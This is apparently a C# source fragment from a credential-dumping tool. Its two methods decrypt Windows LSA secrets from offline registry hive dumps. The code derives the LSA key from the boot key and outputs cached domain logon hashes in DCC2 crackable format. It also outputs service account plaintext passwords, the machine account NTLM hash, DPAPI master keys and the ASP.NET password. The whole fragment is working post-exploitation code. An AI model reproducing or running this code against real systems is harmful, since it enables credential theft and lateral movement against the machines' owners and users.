private static string PrintSecret(string keyName, LsaSecretBlob secretBlob, RegistryHive system) { string secretOutput = string.Format(" [*] {0}\r\n", keyName); if (keyName.ToUpper().StartsWith("_SC_")) { ValueKey startName = GetValueKey(system, string.Format(@"ControlSet001\Services\{0}\ObjectName", keyName.Substring(4))); string pw = Encoding.Unicode.GetString(secretBlob.secret.ToArray()); secretOutput += string.Format("{0}:{1}", Encoding.UTF8.GetString(startName.Data), pw); } else if (keyName.ToUpper().StartsWith("$MACHINE.ACC")) { string computerAcctHash = BitConverter.ToString(Crypto.Md4Hash2(secretBlob.secret)).Replace("-", "").ToLower(); ValueKey domainName = GetValueKey(system, @"ControlSet001\Services\Tcpip\Parameters\Domain"); ValueKey computerName = GetValueKey(system, @"ControlSet001\Services\Tcpip\Parameters\Hostname"); secretOutput += string.Format("{0}\\{1}$:aad3b435b51404eeaad3b435b51404ee:{2}", Encoding.UTF8.GetString(domainName.Data), Encoding.UTF8.GetString(computerName.Data), computerAcctHash); } else if (keyName.ToUpper().StartsWith("DPAPI")) { secretOutput += ("dpapi_machinekey:" + BitConverter.ToString(secretBlob.secret.Skip(4).Take(20).ToArray()).Replace("-", "").ToLower() + "\r\n"); secretOutput += ("dpapi_userkey:" + BitConverter.ToString(secretBlob.secret.Skip(24).Take(20).ToArray()).Replace("-", "").ToLower()); } else if (keyName.ToUpper().StartsWith("NL$KM")) { secretOutput += ("NL$KM:" + BitConverter.ToString(secretBlob.secret).Replace("-", "").ToLower()); } else if (keyName.ToUpper().StartsWith("ASPNET_WP_PASSWORD")) { secretOutput += ("ASPNET:" + System.Text.Encoding.Unicode.GetString(secretBlob.secret)); } else { secretOutput += ("[!] Secret type not supported yet - outputing raw secret as unicode:\r\n"); secretOutput += (System.Text.Encoding.Unicode.GetString(secretBlob.secret)); } return(secretOutput); }
public static List <string> ParseLsa(RegistryHive security, byte[] bootKey, RegistryHive system) { List <string> retVal = new List <string>(); try { byte[] fVal = GetValueKey(security, @"Policy\PolEKList\Default").Data; LsaSecret record = new LsaSecret(fVal); byte[] dataVal = record.data.Take(32).ToArray(); byte[] tempKey = Crypto.ComputeSha256(bootKey, dataVal); byte[] dataVal2 = record.data.Skip(32).Take(record.data.Length - 32).ToArray(); byte[] decryptedLsaKey = Crypto.DecryptAES_ECB(dataVal2, tempKey).Skip(68).Take(32).ToArray(); //get NLKM Secret byte[] nlkmKey = null; NodeKey nlkm = GetNodeKey(security, @"Policy\Secrets\NL$KM"); if (nlkm != null) { retVal.Add(" [*] Cached domain logon information(domain/username:hash)"); nlkmKey = DumpSecret(nlkm, decryptedLsaKey); foreach (ValueKey cachedLogin in GetNodeKey(security, @"Cache").ChildValues) { if (string.Compare(cachedLogin.Name, "NL$Control", StringComparison.OrdinalIgnoreCase) != 0 && !IsZeroes(cachedLogin.Data.Take(16).ToArray())) { NL_Record cachedUser = new NL_Record(cachedLogin.Data); byte[] plaintext = Crypto.DecryptAES_CBC(cachedUser.encryptedData, nlkmKey.Skip(16).Take(16).ToArray(), cachedUser.IV); byte[] hashedPW = plaintext.Take(16).ToArray(); string username = Encoding.Unicode.GetString(plaintext.Skip(72).Take(cachedUser.userLength).ToArray()); string domain = Encoding.Unicode.GetString(plaintext.Skip(72 + Pad(cachedUser.userLength) + Pad(cachedUser.domainNameLength)).Take(Pad(cachedUser.dnsDomainLength)).ToArray()); domain = domain.Replace("\0", ""); retVal.Add(string.Format("{0}/{1}:$DCC2$10240#{2}#{3}", domain, username, username, BitConverter.ToString(hashedPW).Replace("-", "").ToLower())); } } } try { retVal.Add(" [*] LSA Secrets"); foreach (NodeKey secret in GetNodeKey(security, @"Policy\Secrets").ChildNodes) { if (string.Compare(secret.Name, "NL$Control", StringComparison.OrdinalIgnoreCase) != 0) { if (string.Compare(secret.Name, "NL$KM", StringComparison.OrdinalIgnoreCase) != 0) { LsaSecretBlob secretBlob = new LsaSecretBlob(DumpSecret(secret, decryptedLsaKey)); if (secretBlob.length > 0) { retVal.Add(PrintSecret(secret.Name, secretBlob, system)); } } else { LsaSecretBlob secretBlob = new LsaSecretBlob(nlkmKey); if (secretBlob.length > 0) { retVal.Add(PrintSecret(secret.Name, secretBlob, system)); } } } } } catch { retVal.Add("[-] No secrets to parse"); } } catch (Exception e) { retVal.Add("[-] Error parsing SECURITY dump file: " + e.ToString()); } return(retVal); }